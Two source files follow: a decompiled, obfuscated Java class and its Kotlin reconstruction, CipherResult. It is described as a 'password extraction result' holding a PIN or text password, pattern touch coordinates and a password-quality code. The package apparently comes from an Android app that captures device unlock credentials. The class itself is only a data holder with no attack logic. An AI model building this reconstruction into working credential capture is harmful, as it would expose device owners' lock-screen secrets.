File: jadx-reference/rock/service/modules/cipher/CipherResult.java
package com.storm.safe.rock.service.modules.cipher;

import java.io.Serializable;
import java.util.ArrayList;
import p000.AbstractC0003a2;

/* compiled from: r8-map-id-6aa8c380066ac34eca52ba03819884bf743dac35e85c6cbaefaab30e4b90b459 */
/* loaded from: classes2.dex */
public final class CipherResult implements Serializable {

    /* renamed from: a0 */
    public String f53233a0;

    /* renamed from: a1 */
    public ArrayList f53234a1;

    /* renamed from: a2 */
    public String f53235a2;

    public final String toString() {
        String str = this.f53233a0;
        ArrayList arrayList = this.f53234a1;
        String str2 = this.f53235a2;
        StringBuilder sb = new StringBuilder("CipherResult{textCipher='");
        sb.append(str);
        sb.append("', touchCipher=");
        sb.append(arrayList);
        sb.append(", cipherGradeCode='");
        return AbstractC0003a2.m35b6(sb, str2, "'}");
    }
}

File: update-replica/app/src/main/java/com/storm/safe/rock/service/modules/cipher/CipherResult.kt
package com.storm.safe.rock.service.modules.cipher

import java.io.Serializable
import java.util.ArrayList

/**
 * 密码提取结果。
 *
 * JADX: CipherResult.java (31 行)
 * 字段映射:
 *   f53233a0 → textCipher     (文本密码)
 *   f53234a1 → touchCipher    (触摸坐标序列)
 *   f53235a2 → cipherGradeCode (密码等级代码)
 */
class CipherResult : Serializable {

    /** 文本密码 (PIN/密码) */
    var textCipher: String? = null

    /** 触摸坐标序列 (图案密码) */
    var touchCipher: ArrayList<Point>? = null

    /** 密码等级代码: PASSWORD_QUALITY_NUMERIC_COMPLEX / PASSWORD_QUALITY_ALPHANUMERIC / PASSWORD_QUALITY_PATTERN / PASSWORD_QUALITY_TOUCH_POINTS */
    var cipherGradeCode: String? = null

    override fun toString(): String {
        return "CipherResult{textCipher='$textCipher', touchCipher=$touchCipher, cipherGradeCode='$cipherGradeCode'}"
    }
}
